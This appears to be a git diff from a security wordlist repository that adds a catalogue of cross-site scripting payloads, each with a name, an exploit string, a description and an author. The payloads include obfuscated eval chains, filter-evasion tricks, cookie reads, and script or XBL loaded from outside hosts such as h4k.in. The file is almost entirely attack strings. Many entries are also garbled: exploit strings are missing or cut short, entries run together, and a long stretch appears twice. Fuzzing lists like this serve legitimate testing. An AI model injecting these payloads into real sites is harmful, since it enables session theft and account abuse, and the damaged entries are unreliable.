+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/Fuzzing/advanced_xss_jhaddix.txt b/Fuzzing/JHADDIX_XSS.txt similarity index 100% rename from Fuzzing/advanced_xss_jhaddix.txt rename to Fuzzing/JHADDIX_XSS.txt diff --git a/Fuzzing/JHADDIX_XSS_WITH_CONTEXT.txt b/Fuzzing/JHADDIX_XSS_WITH_CONTEXT.txt new file mode 100644 index 0000000..cbe54fd --- /dev/null +++ b/Fuzzing/JHADDIX_XSS_WITH_CONTEXT.txt @@ -0,0 +1,1617 @@ +A very short cross browser header injection +Exploit Name: A very short cross browser header injection +Exploit String: with(document)getElementsByTagName('head')[0].appendChild(createElement('script')).src='//ŋ.ws' +Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area. +Exploit Tags: xss, short, header, injection +Author Name: .mario + +Add onclick event hadler +Exploit Name: Add onclick event hadler +Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source); +Exploit Description: This vector adds an onclick event handler to a tag and appends an obfuscated JS alert. +Exploit Tags: general, JS breaking, basic, obfuscated, user interaction +Author Name: kishor + +Advanced HTML injection locator +Exploit Name: Advanced HTML injection locator +Exploit String:
+Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL.
+Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
+Author Name: thespanner.co.uk
+
+Backslash-obfuscated XBL injection - variant 2
+Exploit Name: Backslash-obfuscated XBL injection - variant 2
+Exploit String:
+Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities.
+Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
+Author Name: thespanner.co.uk
+
+Backslash-obfuscated XBL injection - variant 3
+Exploit Name: Backslash-obfuscated XBL injection - variant 3
+Exploit String:
+Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. As we can see gecko based browsers accept various characters as valid tags.
+Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
+Author Name: thespanner.co.uk
+
+Backslash-obfuscated XBL injection - variant 4
+Exploit Name: Backslash-obfuscated XBL injection - variant 4
+Exploit String:
+Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Furthermore unclosed NBSP entities are used to obfuscate the string.
+Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
+Author Name: thespanner.co.uk
+
+Backslash-obfuscated XBL injection - variant 5
+Exploit Name: Backslash-obfuscated XBL injection - variant 5
+Exploit String:
+Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Between any character of the original payload null bytes are used to obfuscate.
+Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
+Author Name: thespanner.co.uk
+
+BASE
+Exploit Name: BASE
+Exploit String:
+Exploit Description: BGSOUND
+Exploit Tags: general, evil tags
+Author Name: ha.ckers.org
+
+BODY background-image
+Exploit Name: BODY background-image
+Exploit String:
+Exploit Description: BODY image
+Exploit Tags: general, evil tags
+Author Name: ha.ckers.org
+
+BODY ONLOAD
+Exploit Name: BODY ONLOAD
+Exploit String:
+Exploit Description: BODY tag (I like this method because it doesn't require using any variants of ”javascript:” or ”
+
+Exploit Description: For some reason, Firefox picks up the script closing tag in the quoted string and then proceeds to process the remaining script tags as code.
+Exploit Tags: general, gecko, obfuscated, evil tags
+Author Name: t3rmin4t0r
+
+Commented-out Block
+Exploit Name: Commented-out Block
+Exploit String:
+Exploit Description: Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job.
+Exploit Tags: general, obfuscated, conditional comments, internet explorer
+Author Name: ha.ckers.org
+
+Comment-breaker using obfuscated JavaScript
+Exploit Name: Comment-breaker using obfuscated JavaScript
+Exploit String: */a=eval;b=alert;a(b(/e/.source));/*
+Exploit Description: This vector creates an alert by breaking multiline comments.
+Exploit Tags: general, comment breaking, JS breaking
+Author Name: kishor
+
+Conditional style injection for IE
+Exploit Name: Conditional style injection for IE
+Exploit String: width: expression((window.r==document.cookie)?'':alert(r=document.cookie))
+Exploit Description: This vector uses JavaScript conditional statements to inject an alert into CSS properties - it was once used as a PoC for a vulnerability in Stefan Di Paolos data binding example.
+Exploit Tags: general, obfuscated, internet explorer, style injection
+Author Name: DoctorDan
+
+Content Replace
+Exploit Name: Content Replace
+Exploit String: XSS
+Exploit Description: Content replace as an attack vector (assuming ”http://www.google.com/” is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (”java	script:” was converted into ”java script:”.
+Exploit Tags: general, evil tags, obfuscated
+Author Name: ha.ckers.org
+
+Cookie Manipulation
+Exploit Name: Cookie Manipulation
+Exploit String:
+Exploit Description: Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where
+Exploit Description: Div background-image
+Exploit Tags: general, evil tags, style injection
+Author Name: ha.ckers.org
+
+DIV background-image 2
+Exploit Name: DIV background-image 2
+Exploit String:
+Exploit Description: Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279)
+Exploit Tags: general, evil tags, style injection
+Author Name: ha.ckers.org
+
+DIV expression
+Exploit Name: DIV expression
+Exploit String:
+Exploit Description: Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and ”expression”
+Exploit Tags: general, evil tags, style injection, internet explorer
+Author Name: ha.ckers.org
+
+DIV w/Unicode
+Exploit Name: DIV w/Unicode
+Exploit String:
+Exploit Description: DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.
+Exploit Tags: general, evil tags, obfuscated
+Author Name: ha.ckers.org
+
+Double open angle brackets
+Exploit Name: Double open angle brackets
+Exploit String:
+Exploit Description: Iframe (If iframes are allowed there are a lot of other XSS problems as well).
+Exploit Tags: general, evil tags, internet explorer
+Author Name: ha.ckers.org
+
+Image onerror wrapped in XML statement
+Exploit Name: Image onerror wrapped in XML statement
+Exploit String: a=
+
+%3c%69%6d%67%2f%73%72%63%3d%31
+%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e
+
+
+document.write(unescape(a..b))
+Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context.
+Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags
+Author Name: .mario
+
+Image tag with obfuscated JS URI
+Exploit Name: Image tag with obfuscated JS URI
+Exploit String: ;)
+;)
+;)
+Exploit Description: This vector creates three image tags with differing CRLF obfuscation in the javascript: URI.
+Exploit Tags: general, basic, obfuscated, evil tags, internet explorer
+Author Name: OWASP
+
+Image w/CharCode
+Exploit Name: Image w/CharCode
+Exploit String: ))
+Exploit Description: If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need.
+Exploit Tags: general, evil tags, obfuscated, internet explorer
+Author Name: ha.ckers.org
+
+IMG Dynsrc
+Exploit Name: IMG Dynsrc
+Exploit String: ![]()
+Exploit Description: IMG Dynsrc
+Exploit Tags: general, evil tags, internet explorer
+Author Name: ha.ckers.org
+
+IMG Embedded commands 1
+Exploit Name: IMG Embedded commands 1
+Exploit String: 
+Exploit Description: This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors.
+Exploit Tags: general, evil tags
+Author Name: ha.ckers.org
+
+IMG Embedded commands 2
+Exploit Name: IMG Embedded commands 2
+Exploit String: Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
+Exploit Description: IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal 
could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).
+Exploit Tags: general, redirect
+Author Name: ha.ckers.org
+
+IMG Lowsrc
+Exploit Name: IMG Lowsrc
+Exploit String: ![]()
+Exploit Description: IMG Lowsrc
+Exploit Tags: general, evil tags, internet explorer
+Author Name: ha.ckers.org
+
+IMG No Quotes/Semicolon
+Exploit Name: IMG No Quotes/Semicolon
+Exploit String: )
+Exploit Description: No quotes and no semicolon
+Exploit Tags: general, evil tags, internet explorer
+Author Name: ha.ckers.org
+
+IMG STYLE w/expression
+Exploit Name: IMG STYLE w/expression
+Exploit String: exp/*
+Exploit Description: IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).
+Exploit Tags: general, evil tags, internet explorer
+Author Name: ha.ckers.org
+
+IMG w/JavaScript Directive
+Exploit Name: IMG w/JavaScript Directive
+Exploit String: ;)
+Exploit Description: Image XSS using the JavaScript directive.
+Exploit Tags: general, evil tags, internet explorer
+Author Name: ha.ckers.org
+
+IMG w/VBscript
+Exploit Name: IMG w/VBscript
+Exploit String: ![](vbscript:msgbox("XSS"))
+Exploit Description: VBscript in an image
+Exploit Tags: general, evil tags, internet explorer
+Author Name: ha.ckers.org
+
+INPUT Image
+Exploit Name: INPUT Image
+Exploit String:
+Exploit Description: INPUT Image
+Exploit Tags: general, evil tags, internet explorer
+Author Name: ha.ckers.org
+
+IP Encoding
+Exploit Name: IP Encoding
+Exploit String: XSS
+Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed).
+Exploit Tags: general, evil tags, obfuscated
+Author Name: ha.ckers.org
+
+JavaScript concatenation vector variant 1
+Exploit Name: JavaScript concatenation vector variant 1
+Exploit String: s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1
+Exploit Description: This vector concatenates a string and evaluates it via mapping on URL
+Exploit Tags: general, internet explorer, concatenated, obfuscated
+Author Name: PHPIDS Group
+
+JavaScript concatenation vector variant 2
+Exploit Name: JavaScript concatenation vector variant 2
+Exploit String: s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7;
+Exploit Description: This vector concatenates a string and evaluates it via self-execution.
+Exploit Tags: general, concatenated, obfuscated
+Author Name: PHPIDS Group
+
+JavaScript concatenation vector variant 3
+Exploit Name: JavaScript concatenation vector variant 3
+Exploit String: s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i);
+Exploit Description: This vector concatenates a string and evaluates it via usage of common DOM methods and element creation.
+Exploit Tags: general, concatenated, obfuscated
+Author Name: PHPIDS Group
+
+JavaScript concatenation vector variant 4
+Exploit Name: JavaScript concatenation vector variant 4
+Exploit String: s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)'];
+Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a JSON array.
+Exploit Tags: general, JSON, concatenated, obfuscated
+Author Name: PHPIDS Group
+
+JavaScript concatenation vector variant 5
+Exploit Name: JavaScript concatenation vector variant 5
+Exploit String: s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+''];
+Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a JSON array.
+Exploit Tags: general, JSON, concatenated, obfuscated
+Author Name: PHPIDS Group
+
+JavaScript concatenation vector variant 6
+Exploit Name: JavaScript concatenation vector variant 6
+Exploit String: s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7;
+Exploit Description: This vector concatenates a string and evaluates it via filling the URL property with payload concatenated in a string via ternary operators.
+Exploit Tags: general, internet explorer, concatenated, obfuscated
+Author Name: PHPIDS Group
+
+JavaScript concatenation vector variant 7
+Exploit Name: JavaScript concatenation vector variant 7
+Exploit String: s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+'';
+Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a regular string via ternary operators.
+Exploit Tags: general, JSON, concatenated, obfuscated
+Author Name: PHPIDS Group
+
+JavaScript Includes
+Exploit Name: JavaScript Includes
+Exploit String:
+Exploit Description: &JavaScript includes (works in Netscape 4.x). +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +JavaScript Link Location +Exploit Name: JavaScript Link Location +Exploit String: XSS +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed) +JavaScript link location +Exploit Tags: general, evil tags, obfuscated, redirect +Author Name: ha.ckers.org + +JavaScript-breaker using carriage return +Exploit Name: JavaScript-breaker using carriage return +Exploit String: %0da=eval;b=alert;a(b(/d/.source)); +Exploit Description: This vector uses an urlencoded carriage return to break JS code and produce an alert afterwards. +Exploit Tags: general, JS breaking, CRLF +Author Name: kishor + +JS link with whitespace obfuscation +Exploit Name: JS link with whitespace obfuscation +Exploit String: test +Exploit Description: This vector utilizes whitespace to obfuscate and contains a JS link. +Exploit Tags: general, evil tags, obfuscated +Author Name: thespanner.co.uk + +JS string concatenation breaker +Exploit Name: JS string concatenation breaker +Exploit String: +alert(0)+ +Exploit Description: This can be used when input is concatenated in JavaScript. +Exploit Tags: general, JS breaking, basic +Author Name: .mario + +JSON based obfuscated onload vector +Exploit Name: JSON based obfuscated onload vector +Exploit String: +Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM +Exploit Tags: general, evil tags, JSON, obfuscated +Author Name: thespanner.co.uk + +JSON based semicolon-onload vector +Exploit Name: JSON based semicolon-onload vector +Exploit String: +Exploit Description: Layer (Older Netscape only) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +List-style-image +Exploit Name: List-style-image +Exploit String:
could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this).
+Exploit Tags: general, redirect
+Author Name: ha.ckers.org
+
+IMG Lowsrc
+Exploit Name: IMG Lowsrc
+Exploit String: +Exploit Description: &JavaScript includes (works in Netscape 4.x). +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +JavaScript Link Location +Exploit Name: JavaScript Link Location +Exploit String: XSS +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed) +JavaScript link location +Exploit Tags: general, evil tags, obfuscated, redirect +Author Name: ha.ckers.org + +JavaScript-breaker using carriage return +Exploit Name: JavaScript-breaker using carriage return +Exploit String: %0da=eval;b=alert;a(b(/d/.source)); +Exploit Description: This vector uses an urlencoded carriage return to break JS code and produce an alert afterwards. +Exploit Tags: general, JS breaking, CRLF +Author Name: kishor + +JS link with whitespace obfuscation +Exploit Name: JS link with whitespace obfuscation +Exploit String: test +Exploit Description: This vector utilizes whitespace to obfuscate and contains a JS link. +Exploit Tags: general, evil tags, obfuscated +Author Name: thespanner.co.uk + +JS string concatenation breaker +Exploit Name: JS string concatenation breaker +Exploit String: +alert(0)+ +Exploit Description: This can be used when input is concatenated in JavaScript. +Exploit Tags: general, JS breaking, basic +Author Name: .mario + +JSON based obfuscated onload vector +Exploit Name: JSON based obfuscated onload vector +Exploit String: +Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM +Exploit Tags: general, evil tags, JSON, obfuscated +Author Name: thespanner.co.uk + +JSON based semicolon-onload vector +Exploit Name: JSON based semicolon-onload vector +Exploit String: +Exploit Description: Layer (Older Netscape only) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +List-style-image +Exploit Name: List-style-image +Exploit String:
- XSS
+Exploit Description: Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector.
+Exploit Tags: general, evil tags, internet explorer
+Author Name: ha.ckers.org
+
+Livescript
+Exploit Name: Livescript
+Exploit String:
+Exploit Description: Livescript (Older Netscape only) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Local .htc file +Exploit Name: Local .htc file +Exploit String:
+Exploit Description: This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute. +Exploit Tags: general, evil tags, internet explorer, injection +Author Name: ha.ckers.org + +Long UTF-8 Unicode w/out Semicolons +Exploit Name: Long UTF-8 Unicode w/out Semicolons +Exploit String: "> +Exploit Description: Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Markup breaker with special quotes +Exploit Name: Markup breaker with special quotes +Exploit String: %26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// +Exploit Description: This markup breaking vector utilizes specially crafted quotes to break the existing markup. +Exploit Tags: general, html breaking, JS breaking +Author Name: kishor + +META +Exploit Name: META +Exploit String: +Exploit Description: The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs. +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +META w/additional URL parameter +Exploit Name: META w/additional URL parameter +Exploit String: +Exploit Description: Meta with additional URL parameter. If the target website attempts to see if the URL contains an ”http://” you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +META w/data:URL +Exploit Name: META w/data:URL +Exploit String: +Exploit Description: This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Mixed Encoding +Exploit Name: Mixed Encoding +Exploit String: XSS +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +The tabs and newlines only work if this is encapsulated with quotes. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Mocha +Exploit Name: Mocha +Exploit String:
+Exploit Description: Mocha (Older Netscape only) +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Mozilla -moz-binding-url injection +Exploit Name: Mozilla -moz-binding-url injection +Exploit String: style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" +Exploit Description: The vector incudes a binding file via injected style attrbute. Gecko only. +Exploit Tags: general, injection, gecko, style injection, XBL +Author Name: .mario + +Mozilla -moz-binding-url injection - filter evading +Exploit Name: Mozilla -moz-binding-url injection - filter evading +Exploit String: sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar#xss)" a=" +Exploit Description: This vector was once used on a major site to evade a stripping filter and inject binding XML. +Exploit Tags: general, injection, gecko, style injection, XBL +Author Name: PHPIDS Group + +Multiline selfcontained XSS +Exploit Name: Multiline selfcontained XSS +Exploit String: _ += +eval +b=1 +__ += +location +c=1 +_ +( +__ +. +hash +// +. +substr +(1) +) +Exploit Description: This vector uses line breaks to obfuscate and evaluates the location hash. +Exploit Tags: self contained, general, obfuscated +Author Name: .mario + +Multiline w/Carriage Returns +Exploit Name: Multiline w/Carriage Returns +Exploit String:
MOVE MOUSE OVER THIS AREA+Exploit Description: This vector breaks noscript areas and appends an element reacting on mouseover events. +Exploit Tags: general, html breaking, obfuscated, user interaction +Author Name: kishor + +Null Chars 1 +Exploit Name: Null Chars 1 +Exploit String: perl -e 'print "";'> out +Exploit Description: Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example. +Exploit Tags: general, evil tags, obfuscated, internet explorer, CRLF +Author Name: ha.ckers.org + +Null Chars 2 +Exploit Name: Null Chars 2 +Exploit String: perl -e 'print "&
#116;:a +le& #114;t('XS ;S')> +Exploit Description: This attack is built together with obfuscated decimal entities and create a JS image source. +Exploit Tags: general, basic, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Obfuscated image tag using hex entities +Exploit Name: Obfuscated image tag using hex entities +Exploit String: #x61lert( +& #x27XSS')> +Exploit Description: This attack is built together with obfuscated hexadecimal entities and create a JS image source. +Exploit Tags: general, basic, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Obfuscated image tag using long dec entities +Exploit Name: Obfuscated image tag using long dec entities +Exploit String: #0000099ri& #0000112t: +& #0000097le& #0000114t(& #0000039XS& #0000083')> +Exploit Description: This attack is built together with obfuscated long decimal entities and create a JS image source. +Exploit Tags: general, owasp, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Obfuscated JS image source +Exploit Name: Obfuscated JS image source +Exploit String: >"'> evalalerta(1)a,s2=+'',s3=s1+s2,e1=/s/!=/s/?s3[0]: +0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/ +s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/ +s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]: +0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]: +0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a) +Exploit Description: This vector uses XML predicates to obfuscate its payload and the fact that you can use underscores as XML tags. Also a concatenation via ternary operator is being used. +Exploit Tags: general, xml predicates, obfuscated, gecko +Author Name: PHPIDS Group + +Obfuscated XML predicate vector variation 3 +Exploit Name: Obfuscated XML predicate vector variation 3 +Exploit String: o={x:''+eva+l,y:''+aler+t+(1)};function f() { 0[this.x](this.y) }f.call(o); +Exploit Description: This vector uses XML predicates to obfuscate its payload. The payload is furthermore wrapped into JSON literals for more obfuscation. +Exploit Tags: general, xml predicates, obfuscated, gecko, JSON +Author Name: .mario + +Obfuscated XSS variant 1 +Exploit Name: Obfuscated XSS variant 1 +Exploit String: ___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___) +Exploit Description: Shuffled and obfuscated function calls +Exploit Tags: general, obfuscated +Author Name: PHPIDS Group + +OBJECT +Exploit Name: OBJECT +Exploit String: +Exploit Description: If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +OBJECT w/Embedded XSS +Exploit Name: OBJECT w/Embedded XSS +Exploit String: +Exploit Description: Using an OBJECT tag you can embed XSS directly (this is unverified). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +OBJECT w/Flash 2 +Exploit Name: OBJECT w/Flash 2 +Exploit String: a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";eval(a+b+c+d); +Exploit Description: Using this action script inside flash can obfuscate your XSS vector. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Octal Encoding +Exploit Name: Octal Encoding +Exploit String: XSS +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc... +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Open string contained in name property +Exploit Name: Open string contained in name property +Exploit String: open(name) +Exploit Description: This very simple but effective vector uses the open method on the name property. +Exploit Tags: general, super short, self contained +Author Name: SIrDarckCat + +PHP +Exploit Name: PHP +Exploit String: alert("XSS")'); ?> +Exploit Description: PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Plain JavaScript alert +Exploit Name: Plain JavaScript alert +Exploit String: alert(1) +Exploit Description: This very basic exploit works on surprisingly many pages - no real danger but bad image. +Exploit Tags: general, basic, super short +Author Name: .mario + +Protocol Resolution Bypass +Exploit Name: Protocol Resolution Bypass +Exploit String: XSS +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like ”(ht|f)tp(s)?://” (thanks to Ozh (http://planetOzh.com/) for part of this one). You can also change the ”//” to ”\\”. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Protocol resolution in script tags +Exploit Name: Protocol resolution in script tags +Exploit String: tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ”.j” is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag. +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +RegExp based, and native C filter vector. +Exploit Name: RegExp based, and native C filter vector. +Exploit String: 0%0d%0a%00 +Exploit Description: Assuming you can only fit in a few characters and it filters against ”.js” you can rename your JavaScript file to an image as an XSS vector. +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +res:// installed software probing +Exploit Name: res:// installed software probing +Exploit String: res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 +Exploit Description: This res-uri can be used to probe for certain software in IE. +Exploit Tags: URI exploits, injection, general, obfuscated, internet explorer +Author Name: xs-sniper + +SCRIPT w/Alert() +Exploit Name: SCRIPT w/Alert() +Exploit String: +Exploit Description: Basic injection attack +Exploit Tags: general, evil tags, basic +Author Name: ha.ckers.org + +SCRIPT w/Char Code +Exploit Name: SCRIPT w/Char Code +Exploit String: +Exploit Description: Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word ”XSS” will pop up. +Exploit Tags: general, evil tags, obfuscated, basic +Author Name: ha.ckers.org + +SCRIPT w/Source File +Exploit Name: SCRIPT w/Source File +Exploit String: +Exploit Description: No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here). +Exploit Tags: general, evil tags, basic, injection +Author Name: ha.ckers.org + +Self-contained XSS variant 1 +Exploit Name: Self-contained XSS variant 1 +Exploit String: a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1)) +Exploit Description: Concatenates obfuscated eval() and substr() to be called on location.hash +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 2 +Exploit Name: Self-contained XSS variant 2 +Exploit String: a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b)) +Exploit Description: Concatenates fragmented functions to evakuate the location hash +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 3 +Exploit Name: Self-contained XSS variant 3 +Exploit String: eval.call(this,unescape.call(this,location)) +Exploit Description: Uses call() and eval() to access the payload in the fragment identifier +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 4 +Exploit Name: Self-contained XSS variant 4 +Exploit String: d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b))) +Exploit Description: This one is pretty hard to detect due to the total fragmentation. Fragments are built together to a self-executing function. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 5 +Exploit Name: Self-contained XSS variant 5 +Exploit String: l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a +Exploit Description: This variant has the function fragments shuffled to evade concatenation filters and is thus very hard to detect. +Exploit Tags: general, self contained, shuffled +Author Name: PHPIDS Group + +Self-contained XSS variant 6 +Exploit Name: Self-contained XSS variant 6 +Exploit String: _=eval,__=unescape,___=document.URL,_(__(___)) +Exploit Description: Since Javascript allows \w+ as variable name - this vector uses _ to evade filters. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 7 +Exploit Name: Self-contained XSS variant 7 +Exploit String: $_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__) +Exploit Description: Uses special characters as variable names and self-executes the concatenated payload trigger. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 8 +Exploit Name: Self-contained XSS variant 8 +Exploit String: 